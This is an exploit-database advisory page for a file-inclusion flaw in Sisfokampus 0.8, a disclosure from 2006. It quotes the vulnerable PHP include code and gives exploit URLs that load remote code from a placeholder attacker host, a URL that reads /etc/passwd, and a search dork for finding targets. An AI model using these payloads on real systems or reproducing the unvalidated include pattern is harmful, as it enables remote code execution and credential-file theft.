Sisfokampus 0.8 Local File Include Vulnerability

vendor:

Sisfokampus

by:

E. Setio Dewo and Wawan Firmansyah

7,5

CVSS

HIGH

Local File Include

CWE

Product Name: Sisfokampus

Affected Version From: 0.8

Affected Version To: 0.8

Patch Exists: NO

Related CWE: N/A

CPE: a:sisfokampus:sisfokampus:0.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2003

Sisfokampus 0.8 Local File Include Vulnerability

Sisfokampus 0.8 is vulnerable to Local File Include vulnerability. This vulnerability can be exploited by an attacker to include malicious files from a remote server. The vulnerable files are index.php, print.php and download.php. The exploit for index.php is http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?. The exploit for print.php is http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?. The exploit for download.php is http://www.victim.com/download.php?dir=http://attacker.com/evilcode.txt?.

Mitigation:

The best way to mitigate this vulnerability is to restrict the access to the vulnerable files and validate the user input.

Source

Exploit-DB raw data:

#       Source Code = Sisfokampus 0.8
#
#       Website = www.Sisfokampus.net
#
#       Author = E. Setio Dewo (setio_dewo@telkom.net)
#
#       Dorkz : Allinurl: /index.php?exec=


#       File Vuln :     index.php
#                       print.php
#                       download.php ( Local File Include )
#
#       Found by :      Wawan Firmansyah a.k.a Ang|n
                        angkaramurka2003@yahoo.com

###############################################################################

# Source of index.php

       -------------------------[Line 27]-----------------------------
       <?php
          if ($exec=='main.php' && file_exists("$themedir/main.php"))
               include "$themedir/main.php";
               else include $exec;
       ?>
       -------------------------[Line 31]------------------------------

# Source Of print.php

       -------------------------[Line 15]------------------------------
       <?php
       include_once "sysfo/sysfo.common.php";

       if (isset($_REQUEST['print'])) {
       $print = $_REQUEST['print'];
       include "$print";
       }
       else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));

       include "disconnectdb.php";
       ?>
       -------------------------[Line 25]-------------------------------

# Source Of download.php

       -------------------------[Line 1]--------------------------------
       <?php
       DisplayHeader($fmtPageTitle, $strDownload);
       include "lib/file.common.php";
       if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
       else $dir = $Download_dir;
       if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
       DisplayDownloadDir($dir);
       ?>
       -------------------------[Line 8]--------------------------------

##################################################################################

# Exploit of index.php

       http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?

# Exploit of print.php
       http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
       or
       http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?

# Exploit of download.php

       http://www.victim.com/index.php?exec=download&dir=/etc/passwd

##################################################################################

Greatz :
       K-159 ( Thanks for ur Support & Advice )
       #cyberbox community in dal.net
       #indolinux in dal.net
       #edp in dal.net

##################################################################################

# milw0rm.com [2006-11-25]